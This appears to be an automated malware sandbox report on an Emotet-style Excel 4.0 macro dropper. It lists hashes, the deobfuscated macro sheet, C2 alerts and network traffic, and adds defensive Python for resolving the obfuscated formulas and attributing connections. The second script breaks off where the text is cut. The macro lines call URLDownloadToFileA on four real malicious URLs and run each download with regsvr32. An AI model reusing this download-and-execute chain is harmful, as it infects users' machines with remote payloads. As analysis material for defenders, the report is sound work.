                                    SHA-256:26D38B712159C7A3574C91853B0011DCA3051FB2E80000F364AF4FC60A1B1B25
                                    SHA-512:633D407E89084B04A2D35E1E758CFBDE0B7D6ADFB0D5396B2D031AF1770CBFD097934DFE7193779CE6DFA00E92DDAF8A16DF97E322B725468475A82E4F2BC004
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 69%
                                     • Antivirus: Metadefender, Detection: 0%
                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Gydar, Last Saved By: Gydar, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Tue Nov 8 19:22:48 2022, Security: 0
                                    Entropy (8bit):5.4949958293874035
                                    TrID:
                                    • Microsoft Excel sheet (30009/1) 78.94%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                    File name:Untitled-09112022.xls
                                    File size:93696
                                    MD5:8079b54a0c76ba1fec822059aa22ea31
                                    SHA1:c71c6fd2c68cc8746e778e907984927458a13ab8
                                    SHA256:9d0827721715ca365e0138d9a0bbef43bf209005605793b35e3e9b73337426a6
                                    SHA512:f3e1e9cee5c0a6c183be525a64fc333ef008d14bd62bc86b5fec32e44175411b40e997f52620f46540181e933544ebdc9da764424927e594ffa984231161567e
                                    SSDEEP:1536:wKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgDbCXuZH4gb4CEn9J4ZFSsM:wKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgO
                                    TLSH:FE932A86B2F9D89DEA19C734889B4390A762EC204B574BCB3244F3667FB0D501F53697
                                    Icon Hash:e4eea286a4b4bcb4
                                    Document Type:OLE
                                    Number of OLE Files:1
                                    Has Summary Info:
                                    Application Name:Microsoft Excel
                                    Encrypted Document:False
                                    Contains Word Document Stream:False
                                    Contains Workbook/Book Stream:True
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:False
                                    Flash Objects Count:0
                                    Contains VBA Macros:False
                                    Code Page:1251
                                    Author:
                                    Last Saved By:
                                    Create Time:2015-06-05 18:19:34
                                    Last Saved Time:2022-11-08 19:22:48
                                    Creating Application:
                                    Security:0
                                    Document Code Page:1251
                                    Thumbnail Scaling Desired:False
                                    Company:
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:1048576
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.3985130586395627
                                    Base64 Encoded:False
                                    General
                                    Stream Path:\x5SummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.27473604257009626
                                    Base64 Encoded:False
                                    General
                                    Stream Path:Workbook
                                    File Type:Applesoft BASIC program data, first line number 16
                                    Stream Size:83024
                                    Entropy:5.932960419917662
                                    Base64 Encoded:True
                                    Name:Sheet7
                                    Extraction:dynamic
                                    Type:4
                                    Final:False
                                    Visible:True
                                    Protected:False
                                    6,4,=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/","..\elv1.ooocccxxx",0,0)",E10)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx")",E12)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/","..\elv2.ooocccxxx",0,0)",E14)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx")",E16)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cecambrils.cat/wp-content/cXEhHssszV/","..\elv3.ooocccxxx",0,0)",E18)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx")",E20)=FORMULA("=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/","..\elv4.ooocccxxx",0,0)",E22)=FORMULA("=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx")",E24)=FORMULA("=RETURN()",E28)
                                    9,4,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://hsweixintp.com/wp-admin/4m1WxDxza6D8SVrfF/","..\elv1.ooocccxxx",0,0)
                                    11,4,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx")
                                    13,4,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.stickers-et-deco.com/admin002vqimbe/hRFZkkzLIl/","..\elv2.ooocccxxx",0,0)
                                    15,4,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx")
                                    17,4,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cecambrils.cat/wp-content/cXEhHssszV/","..\elv3.ooocccxxx",0,0)
                                    19,4,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx")
                                    21,4,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.clinicaportalpsicologia.com.br/wp-includes/d6tkyFFBNwY/","..\elv4.ooocccxxx",0,0)
                                    23,4,=EXEC("C:\Windows\System32\regsvr32.exe /S ..\elv4.ooocccxxx")
                                    27,4,=RETURN()
                                    Name:Sheet7, Macrosheet
                                    Extraction:static
                                    Type:unknown
                                    Final:unknown
                                    Visible:True
                                    Protected:unknown
                                    SHEET: Sheet7, Macrosheet
CELL:E7, =(((((((FORMULA(((((((((((((('Sheet3'!L24&'Sheet3'!L26)&'Sheet3'!L27)&'Sheet3'!L28)&'Sheet3'!L28)&'Sheet2'!G8)&'Sheet2'!M18)&'Sheet3'!E2)&'Sheet3'!F10)&'Sheet2'!C21)&'Sheet5'!H22)&'Sheet2'!G31)&'Sheet4'!Q4)&'Sheet6'!F9)&'Sheet4'!S19,E10)=FORMULA((((((((((((((((((('Sheet3'!L24&'Sheet3'!G8)&'Sheet3'!F4)&'Sheet3'!G8)&'Sheet3'!O3)&'Sheet3'!L30)&'Sheet3'!F24)&'Sheet3'!L26)&'Sheet4'!I23)&'Sheet4'!G7)&'Sheet3'!A4)&'Sheet4'!I17)&'Sheet3'!A4)&'Sheet4'!B11)&'Sheet3'!F10)&'Sheet6'!S24)&'Sheet4'!M12)&'Sheet6'!F9)&'Sheet3'!F24)&'Sheet3'!L31,E12))=FORMULA(((((((((((((('Sheet3'!L24&'Sheet3'!L26)&'Sheet3'!L27)&'Sheet3'!L28)&'Sheet3'!L28)&'Sheet2'!G8)&'Sheet2'!M18)&'Sheet3'!E2)&'Sheet3'!F10)&'Sheet2'!C21)&'Sheet5'!H22)&'Sheet2'!J33)&'Sheet4'!Q4)&'Sheet6'!J16)&'Sheet4'!S19,E14))=FORMULA((((((((((((((((((('Sheet3'!L24&'Sheet3'!G8)&'Sheet3'!F4)&'Sheet3'!G8)&'Sheet3'!O3)&'Sheet3'!L30)&'Sheet3'!F24)&'Sheet3'!L26)&'Sheet4'!I23)&'Sheet4'!G7)&'Sheet3'!A4)&'Sheet4'!I17)&'Sheet3'!A4)&'Sheet4'!B11)&'Sheet3'!F10)&'Sheet6'!S24)&'Sheet4'!M12)&'Sheet6'!J16)&'Sheet3'!F24)&'Sheet3'!L31,E16))=FORMULA(((((((((((((('Sheet3'!L24&'Sheet3'!L26)&'Sheet3'!L27)&'Sheet3'!L28)&'Sheet3'!L28)&'Sheet2'!G8)&'Sheet2'!M18)&'Sheet3'!E2)&'Sheet3'!F10)&'Sheet2'!C21)&'Sheet5'!H22)&'Sheet2'!L31)&'Sheet4'!Q4)&'Sheet6'!M5)&'Sheet4'!S19,E18))=FORMULA((((((((((((((((((('Sheet3'!L24&'Sheet3'!G8)&'Sheet3'!F4)&'Sheet3'!G8)&'Sheet3'!O3)&'Sheet3'!L30)&'Sheet3'!F24)&'Sheet3'!L26)&'Sheet4'!I23)&'Sheet4'!G7)&'Sheet3'!A4)&'Sheet4'!I17)&'Sheet3'!A4)&'Sheet4'!B11)&'Sheet3'!F10)&'Sheet6'!S24)&'Sheet4'!M12)&'Sheet6'!M5)&'Sheet3'!F24)&'Sheet3'!L31,E20))=FORMULA(((((((((((((('Sheet3'!L24&'Sheet3'!L26)&'Sheet3'!L27)&'Sheet3'!L28)&'Sheet3'!L28)&'Sheet2'!G8)&'Sheet2'!M18)&'Sheet3'!E2)&'Sheet3'!F10)&'Sheet2'!C21)&'Sheet5'!H22)&'Sheet2'!N33)&'Sheet4'!Q4)&'Sheet6'!O12)&'Sheet4'!S19,E22))=FORMULA((((((((((((((((((('Sheet3'!L24&'Sheet3'!G8)&'Sheet3'!F4)&'Sheet3'!G8)&'Sheet3'!O3)&'Sheet3'!L30)&'Sheet3'!F24)&'Sheet3'!L26)&'Sheet4'!I23)&'Sheet4'!G7)&'Sheet3'!A4)&'Sheet4'!I17)&'Sheet3'!A4)&'Sheet4'!B11)&'Sheet3'!F10)&'Sheet6'!S24)&'Sheet4'!M12)&'Sheet6'!O12)&'Sheet3'!F24)&'Sheet3'!L31,E24))=FORMULA((('Sheet3'!L24&'Sheet3'!G44)&'Sheet3'!H46)&'Sheet3'!J44,E28), 0
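The cell E7 formula above is the usual Emotet XLM obfuscation: every child formula is assembled at run time by concatenating one- or few-character fragments scattered over Sheet2 to Sheet6 (note the repeated references such as 'Sheet3'!L28 and 'Sheet3'!A4) and then written into E10, E12, ... E28 with FORMULA(), so nothing readable exists in the workbook until the macro runs. The following Python resolver is an added example, not part of this report or of the sample: it parses such a pure & chain, replays each FORMULA() write against a cell dump, and flags any rebuilt formula that contains a known XLM execution primitive. The cell contents and macro text in it are constructed placeholders in the same shape as E7, not the sample's real values; with a real dump (for example from olevba or XLMMacroDeobfuscator) the same functions show what actually lands in the target cells.

```python
import re
from typing import Dict, List, Tuple

# One sheet-qualified reference such as 'Sheet3'!L24
CELL_REF = re.compile(r"'([^']+)'!([A-Z]{1,3}[0-9]{1,7})")
# One FORMULA(<text expression>,<target cell>) call. In this macro family the text
# expression is a pure & chain of cell references with no commas, so everything up to
# the first comma is the expression and the cell before ')' is the write target.
FORMULA_CALL = re.compile(r"FORMULA\(([^,]*),([A-Z]{1,3}[0-9]{1,7})\)")

# Constructed placeholder cell contents (hypothetical, not the sample's real values).
SAMPLE_CELLS: Dict[str, str] = {
    "'Sheet3'!L24": "=",
    "'Sheet3'!L26": "E",
    "'Sheet3'!L27": "X",
    "'Sheet2'!G8": "C",
    "'Sheet2'!M18": "(",
    "'Sheet3'!F10": '"',
    "'Sheet2'!C21": "c",
    "'Sheet5'!H22": "a",
    "'Sheet2'!G31": "l",
    "'Sheet4'!Q4": ")",
    "'Sheet3'!G44": "H",
    "'Sheet3'!H46": "ALT(",
    "'Sheet3'!J44": ")",
}

# Constructed macro text in the same shape as the report's E7: left-nested & chains
# handed to FORMULA(), which writes the assembled string into another cell.
SAMPLE_MACRO = (
    "=FORMULA(" + "(" * 12
    + "'Sheet3'!L24&'Sheet3'!L26)&'Sheet3'!L27)&'Sheet3'!L26)&'Sheet2'!G8)"
    "&'Sheet2'!M18)&'Sheet3'!F10)&'Sheet2'!C21)&'Sheet5'!H22)&'Sheet2'!G31)"
    "&'Sheet2'!C21)&'Sheet3'!F10)&'Sheet4'!Q4),E10)"
    "=FORMULA((('Sheet3'!L24&'Sheet3'!G44)&'Sheet3'!H46)&'Sheet3'!J44,E28)"
)

# XLM primitives whose presence in a rebuilt formula warrants a closer look.
SUSPICIOUS_XLM = ("CALL(", "EXEC(", "REGISTER(", "URLDOWNLOADTOFILE", "FOPEN(", "RUN(")


def resolve_concat(expr: str, cells: Dict[str, str]) -> str:
    """Evaluate a pure concatenation chain of cell references against a cell dump.

    Parentheses carry no information in a left-nested & chain (per call they are not
    even balanced in E7, because outer parentheses wrap the whole comparison chain),
    so they are ignored. Anything else left over means the expression also uses a
    function such as CHAR() or MID() and needs a real XLM emulator instead.
    """
    leftover = re.sub(r"[()&\s]", "", CELL_REF.sub("", expr))
    if leftover:
        raise ValueError(f"not a pure & chain, leftover tokens: {leftover!r}")
    parts = []
    for sheet, cell in CELL_REF.findall(expr):
        key = f"'{sheet}'!{cell}"
        if key not in cells:
            raise KeyError(f"{key} missing from cell dump")
        parts.append(cells[key])
    return "".join(parts)


def replay_formula_writes(macro: str, cells: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (target cell, assembled text) for every FORMULA() call, in execution order."""
    return [(m.group(2), resolve_concat(m.group(1), cells))
            for m in FORMULA_CALL.finditer(macro)]


def suspicious_writes(writes: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Keep only the rebuilt formulas that contain a known execution primitive."""
    return [(target, text) for target, text in writes
            if any(k in text.upper() for k in SUSPICIOUS_XLM)]


if __name__ == "__main__":
    writes = replay_formula_writes(SAMPLE_MACRO, SAMPLE_CELLS)
    for target, text in writes:
        print(f"{target}: {text}")
    print("suspicious:", suspicious_writes(writes))
```

The check in resolve_concat matters in practice: the moment a chain mixes in CHAR(), MID() or a defined name, string concatenation alone gives a wrong answer, and the resolver refuses rather than emitting something that looks plausible.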
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
11/16/22-05:44:10.140861 | TCP | 2404326 | ET CNC Feodo Tracker Reported CnC Server TCP group 14 | 49179 | 443 | 192.168.2.22 | 218.38.121.17
11/16/22-05:43:55.004674 | TCP | 2404304 | ET CNC Feodo Tracker Reported CnC Server TCP group 3 | 49175 | 80 | 192.168.2.22 | 115.178.55.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 16, 2022 05:43:13.311738968 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.516840935 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.517231941 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.517669916 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.712789059 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.730818033 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.730897903 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.730947971 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.730988979 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.731065989 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.731158972 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.731158972 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.731158972 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.731213093 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.731312990 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.731332064 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.731401920 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.731410980 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.731478930 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.731484890 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.731553078 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.731642962 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.731707096 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.735666037 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.922492981 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.922553062 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.922593117 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.922631979 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.922676086 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.922753096 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.922802925 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.922875881 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.922877073 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.922877073 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.922878027 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.922991037 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.923075914 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.923109055 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.923156977 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.923219919 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.923221111 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.923250914 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.923320055 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.923373938 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.923439026 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.923496008 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.923558950 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.923583031 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.923645973 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.923701048 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.923774004 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.923789978 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.923855066 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.923894882 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.923960924 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.924025059 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.924093008 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.924112082 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.924139977 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.924179077 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.924200058 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:13.924266100 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:13.924705029 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.114227057 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.114286900 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.114372969 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.114453077 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.114528894 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.114543915 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.114543915 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.114543915 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.114573956 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.114599943 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.114629984 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.114696980 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.114768982 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.114778042 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.114844084 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.114922047 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.114993095 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.115044117 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.115108013 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.115118980 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.115202904 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.115211010 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.115268946 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.115308046 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.115371943 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.115447044 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.115514994 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.115586042 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.115657091 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.115674019 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.115714073 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.115747929 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.115791082 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.115855932 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Nov 16, 2022 05:43:14.115928888 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.115978956 CET | 80 | 49171 | 45.207.116.88 | 192.168.2.22
Nov 16, 2022 05:43:14.115994930 CET | 49171 | 80 | 192.168.2.22 | 45.207.116.88
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 16, 2022 05:43:11.957138062 CET | 55868 | 53 | 192.168.2.22 | 8.8.8.8
Nov 16, 2022 05:43:12.959602118 CET | 55868 | 53 | 192.168.2.22 | 8.8.8.8
Nov 16, 2022 05:43:13.303927898 CET | 53 | 55868 | 8.8.8.8 | 192.168.2.22
Nov 16, 2022 05:43:13.643359900 CET | 53 | 55868 | 8.8.8.8 | 192.168.2.22
Nov 16, 2022 05:43:17.954427958 CET | 49688 | 53 | 192.168.2.22 | 8.8.8.8
Nov 16, 2022 05:43:17.972064972 CET | 53 | 49688 | 8.8.8.8 | 192.168.2.22
Nov 16, 2022 05:43:19.771563053 CET | 58836 | 53 | 192.168.2.22 | 8.8.8.8
Nov 16, 2022 05:43:19.821305990 CET | 53 | 58836 | 8.8.8.8 | 192.168.2.22
Nov 16, 2022 05:43:20.525823116 CET | 50134 | 53 | 192.168.2.22 | 8.8.8.8
Nov 16, 2022 05:43:20.949525118 CET | 53 | 50134 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Nov 16, 2022 05:43:13.643457890 CET | 192.168.2.22 | 8.8.8.8 | d026 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 16, 2022 05:43:11.957138062 CET | 192.168.2.22 | 8.8.8.8 | 0xdca | Standard query (0) | hsweixintp.com | A (IP address) | IN (0x0001) | false
Nov 16, 2022 05:43:12.959602118 CET | 192.168.2.22 | 8.8.8.8 | 0xdca | Standard query (0) | hsweixintp.com | A (IP address) | IN (0x0001) | false
Nov 16, 2022 05:43:17.954427958 CET | 192.168.2.22 | 8.8.8.8 | 0x7ac4 | Standard query (0) | www.stickers-et-deco.com | A (IP address) | IN (0x0001) | false
Nov 16, 2022 05:43:19.771563053 CET | 192.168.2.22 | 8.8.8.8 | 0x9445 | Standard query (0) | www.cecambrils.cat | A (IP address) | IN (0x0001) | false
Nov 16, 2022 05:43:20.525823116 CET | 192.168.2.22 | 8.8.8.8 | 0xc28e | Standard query (0) | www.clinicaportalpsicologia.com.br | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 16, 2022 05:43:13.303927898 CET | 8.8.8.8 | 192.168.2.22 | 0xdca | No error (0) | hsweixintp.com | www.hsweixintp.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 16, 2022 05:43:13.303927898 CET | 8.8.8.8 | 192.168.2.22 | 0xdca | No error (0) | www.hsweixintp.com | - | 45.207.116.88 | A (IP address) | IN (0x0001) | false
Nov 16, 2022 05:43:13.643359900 CET | 8.8.8.8 | 192.168.2.22 | 0xdca | No error (0) | hsweixintp.com | www.hsweixintp.com | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 16, 2022 05:43:13.643359900 CET | 8.8.8.8 | 192.168.2.22 | 0xdca | No error (0) | www.hsweixintp.com | - | 45.207.116.88 | A (IP address) | IN (0x0001) | false
Nov 16, 2022 05:43:17.972064972 CET | 8.8.8.8 | 192.168.2.22 | 0x7ac4 | No error (0) | www.stickers-et-deco.com | - | 163.172.108.69 | A (IP address) | IN (0x0001) | false
Nov 16, 2022 05:43:19.821305990 CET | 8.8.8.8 | 192.168.2.22 | 0x9445 | No error (0) | www.cecambrils.cat | cecambrils.cat | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 16, 2022 05:43:19.821305990 CET | 8.8.8.8 | 192.168.2.22 | 0x9445 | No error (0) | cecambrils.cat | - | 185.23.117.132 | A (IP address) | IN (0x0001) | false
Nov 16, 2022 05:43:20.949525118 CET | 8.8.8.8 | 192.168.2.22 | 0xc28e | No error (0) | www.clinicaportalpsicologia.com.br | web15f04.uni5.net | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 16, 2022 05:43:20.949525118 CET | 8.8.8.8 | 192.168.2.22 | 0xc28e | No error (0) | web15f04.uni5.net | - | 187.1.136.16 | A (IP address) | IN (0x0001) | false
                                    • 218.38.121.17
                                    • hsweixintp.com
                                    • www.stickers-et-deco.com
                                    • www.cecambrils.cat
                                    • www.clinicaportalpsicologia.com.br
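Read together, the DNS, TCP and Snort tables show two different kinds of destination: hsweixintp.com is resolved by name and then contacted on port 80 (the only flow whose packets are listed on this page), while the two Feodo Tracker hits, 115.178.55.22:80 and 218.38.121.17:443, have no DNS lookup anywhere in the capture, which is consistent with the report's finding that C2 addresses come from the embedded malware configuration. The other three resolved names were never contacted within the captured packets. The Python below is an added example, not part of the report: it follows each CNAME chain back to the name the client queried, attributes each outbound connection to the A answer that preceded it (None meaning a literal, never-resolved address), and lists resolutions that went unused. The DNS rows are transcribed from the tables above; the connection list takes the first packet of the shown TCP flow and the two alert destinations, since their own packets are not on this page.

```python
from typing import Dict, List, Optional, Set, Tuple

Answer = Tuple[str, str, Optional[str], Optional[str], str]  # ts, name, cname, address, type
Conn = Tuple[str, str, int]                                   # ts, dst ip, dst port

# DNS answers transcribed from the report's DNS answer table.
DNS_ANSWERS: List[Answer] = [
    ("05:43:13.303927898", "hsweixintp.com", "www.hsweixintp.com", None, "CNAME"),
    ("05:43:13.303927898", "www.hsweixintp.com", None, "45.207.116.88", "A"),
    ("05:43:17.972064972", "www.stickers-et-deco.com", None, "163.172.108.69", "A"),
    ("05:43:19.821305990", "www.cecambrils.cat", "cecambrils.cat", None, "CNAME"),
    ("05:43:19.821305990", "cecambrils.cat", None, "185.23.117.132", "A"),
    ("05:43:20.949525118", "www.clinicaportalpsicologia.com.br", "web15f04.uni5.net", None, "CNAME"),
    ("05:43:20.949525118", "web15f04.uni5.net", None, "187.1.136.16", "A"),
]

# Outbound connections: first packet of the TCP flow listed on this page, plus the two
# destinations from the Snort alerts (their packets are not in the shown list).
CONNECTIONS: List[Conn] = [
    ("05:43:13.311738968", "45.207.116.88", 80),
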